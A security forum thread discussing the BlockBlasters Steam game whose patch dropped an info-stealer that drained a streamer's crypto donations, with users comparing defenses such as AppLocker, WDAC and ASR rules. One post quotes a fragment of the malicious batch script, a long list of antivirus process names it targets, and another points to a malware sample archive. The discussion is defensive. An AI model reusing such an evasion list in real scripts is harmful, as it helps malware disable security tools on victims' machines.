Verified Steam game steals streamer's cancer treatment donations

Khushal

Khushal

Level 13
Thread author
Verified
Top Poster
Well-known
Apr 4, 2024
601
3,614
1,169
Content source
https://www.gdatasoftware.com/blog/2025/09/38265-steam-blockblasters-game-downloads-malware
www.bleepingcomputer.com

Verified Steam game steals streamer's cancer treatment donations

A gamer seeking financial support for cancer treatment lost $32,000 after downloading from Steam a verified game named BlockBlasters that drained his cryptocurrency wallet.
www.bleepingcomputer.com www.bleepingcomputer.com

www.gdatasoftware.com

Infected Steam game downloads malware disguised as patch

A 2D platformer game called BlockBlasters has recently started showing signs of malicious activity after a patch release on August 30. While the user is playing the game, various bits of information are lifted from the PC the game is running on - including crypto wallet data. Hundreds of users...
www.gdatasoftware.com www.gdatasoftware.com
 
  • Sad
  • Like
  • Wow
Reactions: Divine_Barakah, brambedkar59, Kongo and 7 others
Khushal said:
www.bleepingcomputer.com

Verified Steam game steals streamer's cancer treatment donations

A gamer seeking financial support for cancer treatment lost $32,000 after downloading from Steam a verified game named BlockBlasters that drained his cryptocurrency wallet.
www.bleepingcomputer.com www.bleepingcomputer.com

www.gdatasoftware.com

Infected Steam game downloads malware disguised as patch

A 2D platformer game called BlockBlasters has recently started showing signs of malicious activity after a patch release on August 30. While the user is playing the game, various bits of information are lifted from the PC the game is running on - including crypto wallet data. Hundreds of users...
www.gdatasoftware.com www.gdatasoftware.com
Click to expand...
Thanks for sharing these links, Khushal! This is a nasty case of malware hidden in a seemingly legitimate Steam game. For anyone not caught up, "Blockblasters" was a verified title on Steam that turned out to be laced with info-stealing malware. It targeted streamers, siphoning off cryptocurrency donations meant for things like cancer treatment—super scummy stuff.

From the articles:
- BleepingComputer details how the game used a malicious executable to steal wallet info, browser data, and more.
- GData's blog breaks down the technical side, showing how it evaded detection and downloaded additional payloads.

Quick tips to stay safe on Steam:
  • Stick to well-reviewed games from known developers.
  • Enable Steam Guard and use strong, unique passwords.
  • Run a reputable antivirus (like Malwarebytes or ESET) and scan downloads.
  • If you're a streamer, double-check donation links and use hardware wallets for crypto.

Has anyone else run into shady Steam games lately? Let's discuss how to spot these red flags early.
 
  • Like
Reactions: Sunqfu
Looks like Bitdefender would have stopped this attack

Screenshot 2025-09-22 at 17-12-55 (JPEG Image 838 × 638 pixels).png


Source: (The game is no longer available on STEAM)
steamcommunity.com

Steam Community :: BlockBlasters

BlockBlasters
steamcommunity.com steamcommunity.com
 
  • Like
  • +Reputation
  • Wow
Reactions: Divine_Barakah, Sorrento, Trident and 6 others
The game was also removed from Steam shortly before this article went online. Interestingly enough, there was at least one live stream where an individual had their system infected in front of a live audience during a fundraiser for cancer treatment, as reported by Twitter user vx-underground.
The heartbreaking reaction of the streamer is a very sobering reminder that malware does real damage to real people and is far more than just some abstract number in some abstract and faraway place.
And it reminds us that the work we do is important.
 
  • Like
  • Hundred Points
Reactions: Sorrento, Trident, Parkinsond and 1 other person
Read about this this morning. It's heartbreaking. Hopefully people can help him recover.

Talking about ways to avoid this, I wonder: would an anti-exe (like CyberLock @danb) or an Application Control (Kaspersky, WDAC, maybe H_C @Andy Ful) have blocked this malware, if it was launching as a child process of steam.exe? Or well, was this the case? Do Steam games launch from this parent process, or are they complete separate processes? Whatever the case, would this kind of security approach block such an attack? :unsure:
 
  • Like
  • Sad
  • Hundred Points
Reactions: Sorrento, Parkinsond, Khushal and 1 other person
RoboMan said:
Read about this this morning. It's heartbreaking. Hopefully people can help him recover.

Talking about ways to avoid this, I wonder: would an anti-exe (like CyberLock @danb) or an Application Control (Kaspersky, WDAC, maybe H_C @Andy Ful) have blocked this malware, if it was launching as a child process of steam.exe? Or well, was this the case? Do Steam games launch from this parent process, or are they complete separate processes? Whatever the case, would this kind of security approach block such an attack? :unsure:
Click to expand...
He had probably only defender has its line of defence. VirusTotal
The above batch file disables defender pretty much like the one that Gdata has covered in their report.
But microsoft being microsoft hasn't provided a signature for the above disabler. I have reported the hash and file to them thrice
If u hop on the relations tab u will understand how many times the same batch file has been reused by different varieties of malware.

1758557849062.png

1758557662110.png
 
  • Like
  • +Reputation
Reactions: Sorrento, brambedkar59, Trident and 3 others
RoboMan said:
Read about this this morning. It's heartbreaking. Hopefully people can help him recover.

Talking about ways to avoid this, I wonder: would an anti-exe (like CyberLock @danb) or an Application Control (Kaspersky, WDAC, maybe H_C @Andy Ful) have blocked this malware, if it was launching as a child process of steam.exe? Or well, was this the case? Do Steam games launch from this parent process, or are they complete separate processes? Whatever the case, would this kind of security approach block such an attack? :unsure:
Click to expand...

The malicious patch uses scripts as an initial attack vector (.bat and .vbs) and Curl Lolbin for some actions, including connections with C2 server.
So, any security layer that properly restricts scripts would block the infection. WDAC alone could also mitigate the attack on the later infection stage (.bat not blocked) if Curl is on the BlockList.
 
  • Like
  • +Reputation
Reactions: Divine_Barakah, RoboMan, Shiz and 2 others
Khushal said:
He had probably only defender has its line of defence. VirusTotal
Click to expand...

The initial .bat was created to run with most AVs:

set AV_PROCESSES=acronisagent.exe aliedefense.exe almon.exe alyac.exe amitiav.exe arcabitav.exe arcticagent.exe ^
ashavast.exe ashmaisv.exe ashserv.exe aswidsagenta.exe avastmobilesecurity.exe avastsvc.exe avastui.exe avengine.exe ^
avgnt.exe avgui.exe avira.exe avp.exe baidu.exe bdagent.exe bkav.exe bytefence.exe ccsvchst.exe cis.exe ^
clamav.exe clamtray.exe clamwin.exe cmcav.exe cmdagent.exe crowdstrike.exe csagent.exe ctxsvc.exe cynetservice.exe ^
deepinstinct.exe defendercontrol.exe drweb32.exe drwebupw.exe egui.exe eguiproxy.exe emsisoft.exe endpoint.exe ^
esets_gui.exe escan.exe falxagent.exe fortitray.exe fsav32.exe f-scan.exe f-secure.exe fsgk32.exe fsdfwd.exe ^
fssm32.exe gddtray.exe gridinsoft.exe hipsservice.exe hitmanpro.exe huorong.exe ikarus.exe integoav.exe jiangmin.exe ^
k7av.exe kav.exe kavsvc.exe kavtray.exe kaspersky.exe kesgui.exe kingsoftav.exe lionic.exe malwarebytes.exe ^
maxsecureav.exe mbam.exe mbamservice.exe mbamtray.exe mcagent.exe mcshield.exe mcsysmon.exe mctray.exe mcvsshld.exe ^
mfemms.exe mfevtps.exe msascui.exe msmpeng.exe msseces.exe nanoscan.exe nav.exe navapsvc.exe navapw32.exe ^
nortonsecurity.exe npfmessenger.exe npfmsg2.exe outpost.exe panagent.exe panda_cloud_antivirus.exe ^
panda_url_filtering.exe psafe.exe psanhost.exe psuaservice.exe qhactivedefense.exe qhtray.exe qhws.exe rising.exe ^
rtlreminder.exe sangfor.exe sbamsvc.exe secureageav.exe secureaplus.exe sentinelagent.exe skyhigh.exe smc.exe ^
smcgui.exe sophosfs.exe sophoshealth.exe sophosui.exe spiderml.exe spidernt.exe spiderui.exe spyshelter.exe ^
ssmgr.exe superantispyware.exe symantec.exe tachyon.exe tehrisagent.exe tencentdlp.exe threatdownagent.exe ^
tmbmserver.exe tmbmsrv.exe tmlisten.exe tmntsrv.exe tmproxy.exe tmproxy.exe trapmineagent.exe trellixagent.exe ^
ufseagnt.exe varist.exe v3lite.exe v3main.exe v3sp.exe vb32av.exe vipre.exe virit.exe virobot.exe ^
vrfsvc.exe vrpsvc.exe vrpt.exe vsmon.exe vsserv.exe webroot.exe webrootsecureanywhere.exe winpatrol.exe ^
winssnotify.exe withsecure.exe wscntfy.exe wzservice.exe xcitium.exe xcommsvr.exe xvirus.exe yandexav.exe ^
zatray.exe zemana.exe zillya.exe zlclient.exe zonerav.exe zxguard.exe zxtray.exe
Click to expand...
 
  • Like
  • +Reputation
Reactions: Trident, Parkinsond and Khushal
Khushal said:
Yeah but i don't think it had anything was able to bypass them barring defender (where it managed to add an exclusion)
Click to expand...

Such thinking is risky. More attention for Defender could also suggest that it is considered harder to bypass (more actions required due to Defender's post-infection detections).
However, the attackers could give Defender more attention because of its popularity.
 
Last edited:
  • Hundred Points
  • Like
Reactions: Khushal and Parkinsond
Andy Ful said:
The malicious patch uses scripts as an initial attack vector (.bat and .vbs) and Curl Lolbin for some actions, including connections with C2 server.
So, any security layer that properly restricts scripts would block the infection. WDAC alone could also mitigate the attack on the later infection stage (.bat not blocked) if Curl is on the BlockList.
Click to expand...
Is this done with ASR rules on defender or applocker?
 
  • Like
Reactions: Andy Ful and Khushal
Shiz said:
Is this done with ASR rules on defender or applocker?
Click to expand...

AppLocker will block the initial .bat script.
Some ASR rules have the potential to block the attack, but this should be tested. In Enterprises, the Defender exclusions made by malware can be blocked by Tamper Protection. However, this requires using Intune or Configuration Manager.
 
  • +Reputation
  • Like
Reactions: Parkinsond and Khushal
For people who want more info or play around with the sample:

https:// vx-underground . org/Malware%20Analysis/2025/2025-09-21%20-%20Block%20Blasters%20-%20Forensic%20Report
 
Last edited by a moderator:
  • Like
Reactions: Trident
User type: Initiator
Application name: firefox.exe
Application path: C:\Program Files\Mozilla Firefox
Component: Web Threat Protection
Result description: Blocked
Type: Malicious link
Name: vx-underground.org
Precision: Exactly
Threat level: High
Object type: Web page
Object name: vx-underground.org
Reason: Automatic analysis
Databases release date: Today, 23/09/2025 14:11:00
Click to expand...
🤔
 
  • Like
Reactions: Kongo and Trident
Kongo said:
They provide analysis results of malware dating back to 2006 or something and also share the malicious samples in an encrypted archive. Thats probably the reason why the site is flagged. But nothing to worry about considering the site itself. (y)
Click to expand...
AVG did not flag this website.
 
  • Like
Reactions: Sorrento and Kongo
Parkinsond said:
AVG did not flag this website.
Click to expand...
As I said there is not really a reason for it. You can also download samples from Any.Run and it isn't considered as malicious. The site is safe and it only shares the malicious samples of the analysis report if one wants to download them.

Password for the archives is "infected"
 
  • Like
Reactions: Sorrento and harlan4096
You must log in or register to reply here.

You may also like...